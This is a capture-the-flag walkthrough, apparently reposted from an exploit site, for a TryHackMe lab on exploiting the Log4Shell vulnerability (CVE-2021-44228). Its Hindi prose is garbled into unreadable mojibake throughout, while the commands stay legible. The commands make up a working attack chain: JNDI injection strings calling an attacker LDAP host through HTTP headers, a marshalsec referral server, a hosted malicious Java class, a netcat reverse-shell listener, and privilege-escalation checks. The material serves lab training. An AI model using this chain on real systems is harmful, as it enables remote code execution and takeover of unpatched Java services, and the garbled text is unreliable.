## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LATHIKA-3006-SOLAR-EXPLOITING-LOG-4J
# ЁЯФе Solar Exploiting Log4j - TryHackMe рд╡реЙрдХрдереНрд░реВ
## ЁЯУМ рд░реВрдо: Solar Exploiting Log4j
рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо: TryHackMe рдХрдард┐рдирд╛рдИ: рдордзреНрдпрдо рд╡рд┐рд╖рдп: Log4Shell (Log4j рднреЗрджреНрдпрддрд╛)
* * *
## ЁЯза рдЙрджреНрджреЗрд╢реНрдп
Log4j рднреЗрджреНрдпрддрд╛ (CVE-2021-44228) рдХрд╛ рдлрд╛рдпрджрд╛ рдЙрдард╛рдХрд░ рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрд╕реАрдХреНрдпреВрд╢рди рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ рдФрд░ рдлрд╝реНрд▓реИрдЧ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВред
* * *
## ЁЯЫая╕П рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЧрдП рдЙрдкрдХрд░рдг
* Nmap
* Burp Suite
* cURL
* Netcat
* Python HTTP Server
* * *
## ЁЯМР рдЪрд░рдг 1: рдЯреЛрд╣реА
### ЁЯФН рд▓рдХреНрд╖реНрдп рд╕реНрдХреИрди рдХрд░реЗрдВ
root@kitploit:~
nmap -sC -sV <TARGET_IP>
### ЁЯУМ рдирд┐рд╖реНрдХрд░реНрд╖
* рдЦреБрд▓реЗ рдкреЛрд░реНрдЯ: 80 (HTTP), рдЕрдиреНрдп рд░реВрдо рдкрд░ рдирд┐рд░реНрднрд░ рдХрд░рддреЗ рд╣реИрдВ
* рд╡реЗрдм рдПрдкреНрд▓рд┐рдХреЗрд╢рди Java-рдЖрдзрд╛рд░рд┐рдд рдмреИрдХрдПрдВрдб рдкрд░ рдЪрд▓ рд░рд╣рд╛ рд╣реИ
* * *
## ЁЯМР рдЪрд░рдг 2: рд╡реЗрдм рдПрдиреНрдпреВрдорд░реЗрд╢рди
* рд╡реЗрдм рдРрдк рдХреЛ рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдЦреЛрд▓реЗрдВ
* рдЗрдирдкреБрдЯреНрд╕ (рд▓реЙрдЧрд┐рди/рд╕рд░реНрдЪ/рд╣реЗрдбрд░ рдлрд╝реАрд▓реНрдб) рдХреЗ рд╕рд╛рде рдЗрдВрдЯрд░реИрдХреНрдЯ рдХрд░реЗрдВ
* Burp Suite рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд░рд┐рдХреНрд╡реЗрд╕реНрдЯ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ
* * *
## ЁЯТе рдЪрд░рдг 3: Log4j рднреЗрджреНрдпрддрд╛ рдХреА рдкрд╣рдЪрд╛рди рдХрд░реЗрдВ
Log4j рднреЗрджреНрдпрддрд╛ JNDI рдЗрдВрдЬреЗрдХреНрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}
рдпрджрд┐ рдЗрдирдкреБрдЯ рд▓реЙрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ тЖТ рднреЗрджреНрдпрддрд╛ рдореМрдЬреВрдж рд╣реИред
* * *
## тЪЩя╕П рдЪрд░рдг 4: рд▓рд┐рд╕рдирд░ рд╕реЗрдЯ рдХрд░реЗрдВ
### Netcat рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ
root@kitploit:~
nc -lvnp 4444
### рдореИрд▓рд┐рд╢рд┐рдпрд╕ LDAP рд╕рд░реНрд╡рд░ рдкреНрд░рд╛рд░рдВрдн рдХрд░реЗрдВ (рдЙрджрд╛рд╣рд░рдг)
root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
LDAP рд╕рд░реНрд╡рд░ рдЪрд▓рд╛рдПрдБ:
root@kitploit:~
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
* * *
## ЁЯУб рдЪрд░рдг 5: рдкреЗрд▓реЛрдб рд╣реЛрд╕реНрдЯ рдХрд░реЗрдВ
root@kitploit:~
python3 -m http.server 8000
рдореИрд▓рд┐рд╢рд┐рдпрд╕ Java рдХреНрд▓рд╛рд╕ (Exploit.class) рдмрдирд╛рдПрдБ
* * *
## ЁЯЪА рдЪрд░рдг 6: рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдЯреНрд░рд┐рдЧрд░ рдХрд░реЗрдВ
рдкреЗрд▓реЛрдб рдХреЛ рднреЗрджреНрдп рдлрд╝реАрд▓реНрдб рдореЗрдВ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░реЗрдВ:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
ЁЯТб рдЗрди рд╣реЗрдбрд░реНрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ:
* User-Agent
* X-Api-Version
* * *
## ЁЯЦея╕П рдЪрд░рдг 7: рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ
рдЯреНрд░рд┐рдЧрд░ рд╣реЛрдиреЗ рдХреЗ рдмрд╛рдж:
* рдЯрд╛рд░рдЧреЗрдЯ Netcat рд▓рд┐рд╕рдирд░ рд╕реЗ рд╡рд╛рдкрд╕ рдХрдиреЗрдХреНрдЯ рдХрд░рддрд╛ рд╣реИ
* рдЖрдкрдХреЛ рд╢реЗрд▓ рдПрдХреНрд╕реЗрд╕ рдорд┐рд▓рддрд╛ рд╣реИ
* * *
## ЁЯФР рдЪрд░рдг 8: рдкреНрд░рд┐рд╡рд┐рд▓реЗрдЬ рдПрд╕реНрдХреЗрд▓реЗрд╢рди (рдпрджрд┐ рдЖрд╡рд╢реНрдпрдХ рд╣реЛ)
рдЬрд╛рдБрдЪреЗрдВ:
root@kitploit:~
sudo -l
рдЗрдирдХреА рддрд▓рд╛рд╢ рдХрд░реЗрдВ:
* рдЧрд▓рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░ рдХреА рдЧрдИ SUID рдмрд╛рдЗрдирд░реА
* рд▓рд┐рдЦрдиреЗ рдпреЛрдЧреНрдп рдлрд╝рд╛рдЗрд▓реЗрдВ
* рдХреНрд░реЙрди рдЬреЙрдмреНрд╕
* * *
## ЁЯЪй рдЪрд░рдг 9: рдлрд╝реНрд▓реИрдЧ рдХреИрдкреНрдЪрд░ рдХрд░реЗрдВ
root@kitploit:~
find / -name flag.txt 2>/dev/null
cat flag.txt
## ЁЯз╛ рдореБрдЦреНрдп рдЕрд╡рдзрд╛рд░рдгрд╛рдПрдБ рд╕реАрдЦреАрдВ
* Log4Shell (CVE-2021-44228)
* JNDI рдЗрдВрдЬреЗрдХреНрд╢рди
* рд░рд┐рдореЛрдЯ рдХреЛрдб рдПрдХреНрд╕реАрдХреНрдпреВрд╢рди (RCE)
* рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓
* рд╡реЗрдм рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯреЗрд╢рди